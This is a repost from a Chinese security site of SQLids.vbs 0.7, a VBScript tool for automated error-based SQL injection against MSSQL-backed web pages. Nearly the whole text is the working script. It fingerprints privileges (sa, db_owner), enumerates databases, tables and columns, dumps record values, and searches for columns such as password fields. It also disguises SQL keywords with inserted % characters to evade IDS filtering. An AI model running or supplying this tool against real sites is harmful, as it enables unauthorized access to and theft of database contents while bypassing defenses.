SQLids.vbs 0.7(最终版,以后改成gui界面的) 's

admin 2017年5月5日23:40:16评论288 views字数 7466阅读24分53秒阅读模式

# 鬼仔:lcx老大过来提醒更新到0.5了,貌似直接从0.2到0.5。

# 鬼仔:lcx老大过来提醒更新到0.5了,貌似直接从0.2到0.5。



set arg=wscript.arguments If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then Wscript.Quit End If if arg.count=0 then usage() Wscript.Quit End If  Sub usage() wsh.echo string(79,"*") wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url" wsh.echo "sqlids v0.7 for mssql2000 with error  by lcx" wsh.echo "以下两个脚本可互相参考" wsh.echo "http://hi.baidu.com/myvbscript/blog/item/49dd4c60a56d4eda8cb10dd3.html" wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html" wsh.echo "Usage:" wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit" wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname" wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table master" wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 filed master spt_server_info" wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 result id master sysinfo" wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search pass" wsh.echo string(79,"*")&vbcrlf end Sub Function getHTTPPage(Path) t = GetBody(Path) getHTTPPage = BytesToBstr(t, "GB2312") End Function  Function UrlEncode(str) str = Replace(str," ","%20") UrlEncode = str End Function  Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交 On Error Resume Next Aurl=Split(url,"?") '这是为post提交的 Set Retrieval = CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "post", Aurl(0), False, "", "" .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .setRequestHeader "Accept-Encoding", "gzip, deflate" .setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" .setRequestHeader "Connection", "Keep-Alive" .setRequestHeader "Cache-Control", "no-cache" .Send UrlEncode(Aurl(1)) 'post提交 GetBody = .ResponseBody .abort End With Set Retrieval = Nothing End Function Function BytesToBstr(Body, Cset) Dim objstream Set objstream = CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode = 3 objstream.Open objstream.Write Body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadTExt objstream.Close Set objstream = Nothing End Function Function ReplaceKeyWord(Value)'绕过ids过虑 Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown->shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]|sp_->s%p_|[k]|and->a%nd" Dim i, Relpacement, Temp Relpacement = Split(Table, "|[k]|") ReplaceKeyWord = Value For i = 0 to UBound(Relpacement) Temp = Split(Relpacement(i), "->") If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1)) NExt End Function Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会 aHTML = Split(sHTMLTEMP, "varchar") If(UBound(aHTML) > 0)Then sHTMLTEMP = aHTML(1) aHTML = Split(sHTMLTEMP, "'") sHTMLTEMP = aHTML(1) End If result=sHTMLTEMP End Function  Function Str2HEx(strHEx)'sql的16进制转换函数 Dim sHEx For i = 1 To Len(strHEx) sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00" NExt Str2HEx = "0x"&sHEx End Function  Function Str2HExtwo(strHEx)'sql的16进制转换函数 Dim sHEx For i = 1 To Len(strHEx) sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1))) NExt Str2HExtwo = "0x"&sHEx End Function  Function MoveR(Rstr) '去重复 Dim i,SpStr SpStr = Split(Rstr,",") For i = 0 To Ubound(Spstr) If I = 0 then MoveR = MoveR & SpStr(i) & "," Else If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then MoveR = MoveR & SpStr(i) Elseif instr(MoveR,SpStr(i))=0 Then MoveR = MoveR & SpStr(i) & "," End If End If NExt End Function function page(sql) page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"") End Function  url=arg(0)  injection =arg(1)  '--------------------------------------以下代码是注入语句,完全不需要引号 select case arg(1)  Case "limit" body=Replace(getHTTPPage(url),Chr(34),"") '语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--" sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--" Bodyone=page(sqlone) bodytwo=page(sqltwo) wsh.echo "当前信息:" If Len(body)=Len(Bodyone) Then wsh.echo "SA"  If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then wsh.echo "DB_owner" Else wsh.echo "PUBLIC" End If  sqlthtree="and @@servername>0--|and @@version>0--|and  user>0--|and db_name()>0--" rtemp=Split(sqlthtree,"|") servername=result(page(rtemp(0))) version=result(page(rtemp(1))) user=result(page(rtemp(2))) db_name=result(page(rtemp(3))) wsh.echo "servername:"&servername wsh.echo "version:"&version wsh.echo "user:"& user wsh.echo "db_name:"& db_name  case "dbname" i=1 Do sql="and db_name("&i&")>0--" '暴库名语句 Body = page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0  case "table" i=1 Do ' 表名语句 agr(2)表示库 sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))--" Body = page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0  case "filed" sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0-- " biaoid=result(page(sqlbiaoid)) biaoid=Replace(biaoid,Chr(124),"") sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- " k=Replace(result(page(sqlclounmcnt)),Chr(94),"") wsh.echo "共有列名"&k&"个" For i=1 To k sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&" order by colid) t order by colid desc)=0--" wsh.echo result(page(sqlfiled)) nExt  case "result"  i=1 sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句 k=result(page(sqlcloum)) k=Replace(k,Chr(94),"") wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf For i=1 To k sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--" Body = page(sqlneirong) wscript.echo Replace(result(body),Chr(94),"") Next  Case "search" love=Str2HExtwo(arg(2)) wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式" TimeSpend = Timer For i=1 To 10 '可以根据需要改动这个10 sqlsearch="And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/* */as/* */c_name/* */from/* */syscolumns/* */where/* */charindEx(cast("&love&"/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/* */by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>0--" Body = page(sqlsearch) body=result(body) a=a&body&"," NExt TimeSpend = round(Timer - TimeSpend,2) wsh.echo MoveR(a) wsh.echo  "用时:" & TimeSpend & "秒."  Case Else If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then wscript.echo "注意参数" usage() End if end select

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  • 本文由 发表于 2017年5月5日23:40:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SQLids.vbs 0.7(最终版,以后改成gui界面的) 'shttps://cn-sec.com/archives/44924.html


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